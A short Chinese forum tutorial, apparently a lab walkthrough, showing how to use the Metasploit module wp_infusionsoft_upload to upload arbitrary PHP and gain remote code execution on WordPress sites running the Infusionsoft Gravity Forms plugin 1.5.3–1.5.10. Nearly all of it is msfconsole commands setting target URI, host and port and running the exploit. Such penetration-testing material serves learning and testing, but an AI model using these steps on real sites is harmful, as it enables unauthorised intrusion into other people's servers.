WordPress实战渗透测试教程:利用插件(Infusionsoft)的文件上传漏洞

该模块利用WordPress Infusionsoft Gravity Forms插件中的任意PHP代码上传,版本从1.5.3到1.5.10。该漏洞允许任意文件上传漏和远程代码执行。
利用目标
Infusionsoft Gravity Forms插件1.5.3
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
渗透测试教程:利用Infusionsoft的文件上传漏洞来审计WordPress
现在输入  exploit use / unix / webapp / wp_ infusionsoft_upload
msf exploit (wp_infusionsoft_upload)>set targeturi /wordpress
msf exploit (wp_infusionsoft_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_infusionsoft_upload)>set rport 80
msf exploit (wp_infusionsoft_upload)>exploit  
渗透测试教程:利用Infusionsoft的文件上传漏洞来审计WordPress
转载请注明本文链接: http://www.mayidui.net/t2319.html
游客
登录后才可以回帖,登录 或者 注册